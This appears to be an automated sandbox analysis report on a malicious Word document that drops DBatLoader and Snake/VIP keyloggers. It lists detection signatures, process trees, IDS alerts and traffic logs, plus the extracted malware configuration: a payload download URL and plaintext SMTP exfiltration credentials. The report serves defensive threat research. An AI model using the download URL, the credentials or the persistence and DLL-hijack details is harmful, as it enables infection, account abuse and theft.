Windows Analysis Report
PI ITS15235.doc

Overview

General Information

Sample name: PI ITS15235.doc
Analysis ID: 1584674
MD5: 1be2a4992097f506fd7ddb85625c2f1e
SHA1: f197c2aa2c4c1dd1059d04309b22359d46fec69b
SHA256: 5573f50bf399a289981af095f020610e04ede3126835312bf7dc4de27f6bb602
Tags: doc, user-abuse_ch

Detection

DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected PureLog Stealer
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains method to dynamically call methods (often used by packers)
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document exploit detected (process start blacklist hit)
Drops PE files with a suspicious file extension
Drops executables to the windows directory (C:\Windows) and starts them
Machine Learning detection for sample
Office process drops PE file
Office process queries suspicious COM object (likely to drop second stage)
Sample is not signed and drops a device driver
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Suspicious Program Location with Network Connections
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • WINWORD.EXE (PID: 7412 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
    • brightness.exe (PID: 7884 cmdline: C:\Windows\SysWOW64\brightness.exe MD5: BF9B75ADF866583299DBC8A5FAD66CFC)
      • cmd.exe (PID: 8056 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • npratlsN.pif (PID: 8112 cmdline: C:\Users\Public\Libraries\npratlsN.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • Nsltarpn.PIF (PID: 2496 cmdline: "C:\Users\Public\Libraries\Nsltarpn.PIF" MD5: BF9B75ADF866583299DBC8A5FAD66CFC)
    • cmd.exe (PID: 2020 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • npratlsN.pif (PID: 3980 cmdline: C:\Users\Public\Libraries\npratlsN.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • Nsltarpn.PIF (PID: 7664 cmdline: "C:\Users\Public\Libraries\Nsltarpn.PIF" MD5: BF9B75ADF866583299DBC8A5FAD66CFC)
    • cmd.exe (PID: 7712 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • npratlsN.pif (PID: 7692 cmdline: C:\Users\Public\Libraries\npratlsN.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • cleanup
Name: DBatLoader
Description: This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Download Url": ["https://amazonenviro.com/245_Nsltarpncon"]}
{"Exfil Mode": "SMTP", "Email ID": "info@irco.com.sa", "Password": "info12A", "Host": "mail.irco.com.sa", "Port": "587", "Version": "4.4"}
{"Exfil Mode": "SMTP", "Username": "info@irco.com.sa", "Password": "info12A", "Host": "mail.irco.com.sa", "Port": "587", "Version": "4.4"}
Source: 00000008.00000001.1851558247.0000000000400000.00000040.00000001.00020000.00000000.sdmp; Rule: MALWARE_Win_RedLine; Description: Detects RedLine infostealer; Author: ditekSHen
Source: 0000000E.00000002.3047709158.0000000000BE0000.00000040.00000400.00020000.00000000.sdmp; Rule: JoeSecurity_DBatLoader; Description: Yara detected DBatLoader; Author: Joe Security
Source: 0000000E.00000002.3083897007.000000003438B000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_VIPKeylogger; Description: Yara detected VIP Keylogger; Author: Joe Security
Source: 00000004.00000002.1900364042.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp; Rule: JoeSecurity_DBatLoader; Description: Yara detected DBatLoader; Author: Joe Security
Source: 0000000E.00000002.3083897007.0000000034231000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_SnakeKeylogger; Description: Yara detected Snake Keylogger; Author: Joe Security
          Source: 14.2.npratlsN.pif.400000.1.raw.unpack; Rule: MALWARE_Win_RedLine; Description: Detects RedLine infostealer; Author: ditekSHen
          Source: 18.2.npratlsN.pif.400000.1.raw.unpack; Rule: MALWARE_Win_RedLine; Description: Detects RedLine infostealer; Author: ditekSHen
          Source: 14.1.npratlsN.pif.400000.1.raw.unpack; Rule: MALWARE_Win_RedLine; Description: Detects RedLine infostealer; Author: ditekSHen
          Source: 4.2.brightness.exe.217d67a8.10.unpack; Rule: MALWARE_Win_RedLine; Description: Detects RedLine infostealer; Author: ditekSHen
          Source: 8.2.npratlsN.pif.400000.2.raw.unpack; Rule: MALWARE_Win_RedLine; Description: Detects RedLine infostealer; Author: ditekSHen

          System Summary

          Source: File created; Author: frack113, Nasreddine Bencherchali; Data: EventID: 11, Image: C:\Windows\SysWOW64\brightness.exe, ProcessId: 7884, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
          Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: C:\Users\Public\Libraries\npratlsN.pif, CommandLine: C:\Users\Public\Libraries\npratlsN.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\npratlsN.pif, NewProcessName: C:\Users\Public\Libraries\npratlsN.pif, OriginalFileName: C:\Users\Public\Libraries\npratlsN.pif, ParentCommandLine: C:\Windows\SysWOW64\brightness.exe, ParentImage: C:\Windows\SysWOW64\brightness.exe, ParentProcessId: 7884, ParentProcessName: brightness.exe, ProcessCommandLine: C:\Users\Public\Libraries\npratlsN.pif, ProcessId: 8112, ProcessName: npratlsN.pif
          Source: File created; Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ProcessId: 7412, TargetFilename: C:\Windows\SysWOW64\brightness.exe
          Source: File created; Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\SysWOW64\brightness.exe, ProcessId: 7884, TargetFilename: C:\Windows \SysWOW64\svchost.exe
          Source: Registry Key set; Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing; Data: Details: C:\Users\Public\Nsltarpn.url, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\brightness.exe, ProcessId: 7884, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nsltarpn
          Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Libraries\Nsltarpn.PIF" , ParentImage: C:\Users\Public\Libraries\Nsltarpn.PIF, ParentProcessId: 2496, ParentProcessName: Nsltarpn.PIF, ProcessCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, ProcessId: 2020, ProcessName: cmd.exe
          Source: Network Connection; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: DestinationIp: 158.101.44.242, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Public\Libraries\npratlsN.pif, Initiated: true, ProcessId: 8112, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49753
          Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\Public\Nsltarpn.url, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\brightness.exe, ProcessId: 7884, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nsltarpn
          Source: Process started; Author: Max Altgelt (Nextron Systems); Data: Command: C:\Users\Public\Libraries\npratlsN.pif, CommandLine: C:\Users\Public\Libraries\npratlsN.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\npratlsN.pif, NewProcessName: C:\Users\Public\Libraries\npratlsN.pif, OriginalFileName: C:\Users\Public\Libraries\npratlsN.pif, ParentCommandLine: C:\Windows\SysWOW64\brightness.exe, ParentImage: C:\Windows\SysWOW64\brightness.exe, ParentProcessId: 7884, ParentProcessName: brightness.exe, ProcessCommandLine: C:\Users\Public\Libraries\npratlsN.pif, ProcessId: 8112, ProcessName: npratlsN.pif
          Source: Network Connection; Author: X__Junior (Nextron Systems); Data: DestinationIp: 192.168.2.4, DestinationIsIpv6: false, DestinationPort: 49739, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, Initiated: true, ProcessId: 7412, Protocol: tcp, SourceIp: 147.124.216.113, SourceIsIpv6: false, SourcePort: 80
          Source: Network Connection; Author: frack113; Data: DestinationIp: 46.151.208.21, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\Public\Libraries\npratlsN.pif, Initiated: true, ProcessId: 8112, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49796
          Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
          2025-01-06T07:53:18.199849+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49744 | 166.62.27.188 | 443 | TCP
          2025-01-06T07:53:27.933122+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49755 | 188.114.96.3 | 443 | TCP
          2025-01-06T07:53:30.961117+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49759 | 188.114.96.3 | 443 | TCP
          2025-01-06T07:53:32.919827+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49762 | 188.114.96.3 | 443 | TCP
          2025-01-06T07:53:34.524984+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49764 | 188.114.96.3 | 443 | TCP
          2025-01-06T07:53:36.797073+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49768 | 188.114.96.3 | 443 | TCP
          2025-01-06T07:53:39.678729+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49776 | 188.114.96.3 | 443 | TCP
          2025-01-06T07:53:40.913383+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49780 | 188.114.96.3 | 443 | TCP
          2025-01-06T07:53:42.711030+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49783 | 188.114.96.3 | 443 | TCP
          2025-01-06T07:53:46.590984+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49791 | 188.114.96.3 | 443 | TCP
          2025-01-06T07:53:48.430076+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49795 | 188.114.96.3 | 443 | TCP
          2025-01-06T07:53:49.287543+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49798 | 188.114.96.3 | 443 | TCP
          2025-01-06T07:53:50.496870+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49802 | 188.114.96.3 | 443 | TCP
          2025-01-06T07:53:53.209273+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49806 | 188.114.96.3 | 443 | TCP
          2025-01-06T07:53:26.185701+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49753 | 158.101.44.242 | 80 | TCP
          2025-01-06T07:53:27.495502+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49753 | 158.101.44.242 | 80 | TCP
          2025-01-06T07:53:28.592083+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49756 | 158.101.44.242 | 80 | TCP
          2025-01-06T07:53:37.614845+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49767 | 158.101.44.242 | 80 | TCP
          2025-01-06T07:53:39.114951+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49767 | 158.101.44.242 | 80 | TCP
          2025-01-06T07:53:40.308163+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49779 | 158.101.44.242 | 80 | TCP
          2025-01-06T07:53:44.665578+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49786 | 158.101.44.242 | 80 | TCP
          2025-01-06T07:53:46.009341+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49786 | 158.101.44.242 | 80 | TCP
          2025-01-06T07:53:48.681290+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49794 | 158.101.44.242 | 80 | TCP
          2025-01-06T07:53:40.506357+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.4 | 49778 | 149.154.167.220 | 443 | TCP
          2025-01-06T07:53:52.312826+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.4 | 49805 | 149.154.167.220 | 443 | TCP
          2025-01-06T07:54:00.405289+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.4 | 49818 | 149.154.167.220 | 443 | TCP

          AV Detection

          Source: PI ITS15235.doc; Avira: detected
          Source: 0000000E.00000002.3083897007.0000000034231000.00000004.00000800.00020000.00000000.sdmp; Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "info@irco.com.sa", "Password": "info12A", "Host": "mail.irco.com.sa", "Port": "587", "Version": "4.4"}
          Source: 8.3.npratlsN.pif.26ade320.0.raw.unpack; Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "info@irco.com.sa", "Password": "info12A", "Host": "mail.irco.com.sa", "Port": "587", "Version": "4.4"}
          Source: 4.0.brightness.exe.400000.0.unpack; Malware Configuration Extractor: DBatLoader {"Download Url": ["https://amazonenviro.com/245_Nsltarpncon"]}
          Source: PI ITS15235.doc; Joe Sandbox ML: detected

          Location Tracking

          Source: unknown; DNS query: name: reallyfreegeoip.org

          Compliance

          Source: C:\Users\Public\Libraries\npratlsN.pif; Unpacked PE file: 8.2.npratlsN.pif.400000.2.unpack
          Source: C:\Users\Public\Libraries\npratlsN.pif; Unpacked PE file: 14.2.npratlsN.pif.400000.1.unpack
          Source: C:\Users\Public\Libraries\npratlsN.pif; Unpacked PE file: 18.2.npratlsN.pif.400000.1.unpack
          Source: unknown; HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49754 version: TLS 1.0
          Source: unknown; HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49773 version: TLS 1.0
          Source: unknown; HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49789 version: TLS 1.0
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE; File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
          Source: unknown; HTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49744 version: TLS 1.2
          Source: unknown; HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49778 version: TLS 1.2
          Source: unknown; HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49805 version: TLS 1.2
          Source: unknown; HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49818 version: TLS 1.2
          Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1897857234.000000002152E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.000000002066B000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.000000002057D000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2005809336.0000000020EF0000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1964311018.0000000000661000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: easinvoker.pdb source: brightness.exe, 00000004.00000002.1894871858.00000000205E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.0000000020649000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1846070015.000000007F410000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.0000000020508000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: _.pdb source: npratlsN.pif, 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1976468099.0000000032464000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2072252048.000000001EAD6000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: easinvoker.pdbGCTL source: brightness.exe, 00000004.00000002.1894871858.00000000205E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1847028273.0000000021501000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1847028273.00000000214D2000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.0000000020649000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1846070015.000000007F410000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.0000000020508000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1963965217.0000000000691000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1963965217.0000000000662000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000F.00000003.2043487630.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000F.00000003.2043487630.00000000005F7000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Windows\SysWOW64\brightness.exe; Code function: 4_2_029058B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,4_2_029058B4

          Software Vulnerabilities

          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE; File created: C:\Windows\SysWOW64\brightness.exe
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE; File created: brightness.exe.0.dr
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE; Process created: C:\Windows\SysWOW64\brightness.exe
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C89D31Eh8_2_2C89D050
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C893311h8_2_2C893068
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C89B32Eh8_2_2C89B060
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C895709h8_2_2C895460
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C894D21h8_2_2C894A78
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then mov esp, ebp8_2_2C899B8B
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C891449h8_2_2C8911A0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C89EE7Eh8_2_2C89EBB0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C894471h8_2_2C8941C8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C89CE8Eh8_2_2C89CBC0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C89AE9Eh8_2_2C89ABD0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C8918A1h8_2_2C8915F8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C893BC1h8_2_2C893918
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C895FB9h8_2_2C895D10
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C89E9EEh8_2_2C89E720
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C89C9FEh8_2_2C89C730
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C890FF1h8_2_2C890D48
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C89AA0Eh8_2_2C89A740
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C89701Ah8_2_2C896F69
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C896411h8_2_2C896168
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C89FC2Eh8_2_2C89F960
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C89701Ah8_2_2C896F70
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C894019h8_2_2C893D70
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C89DC3Eh8_2_2C89D970
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C905730h8_2_2C905438
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C906588h8_2_2C906290
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C905107h8_2_2C904D98
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C909090h8_2_2C908D98
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C90A878h8_2_2C90A580
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C902756h8_2_2C902488
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C90D380h8_2_2C90D088
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C9078A8h8_2_2C9075B0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C901086h8_2_2C900DB8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C90A3B0h8_2_2C90A0B8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C90BB98h8_2_2C90B8A0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C903076h8_2_2C902DA8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C90E6A0h8_2_2C90E3A8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C90079Eh8_2_2C9004D0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C908BC8h8_2_2C9088D0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C9019A6h8_2_2C9016D8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C90B6D0h8_2_2C90B3D8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C90CEB8h8_2_2C90CBC0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C903997h8_2_2C9036C8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C9060C0h8_2_2C905DC8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C90F9C0h8_2_2C90F6C8
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C909EE8h8_2_2C909BF0
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 4x nop then jmp 2C9022C6h8_2_2C901FF8
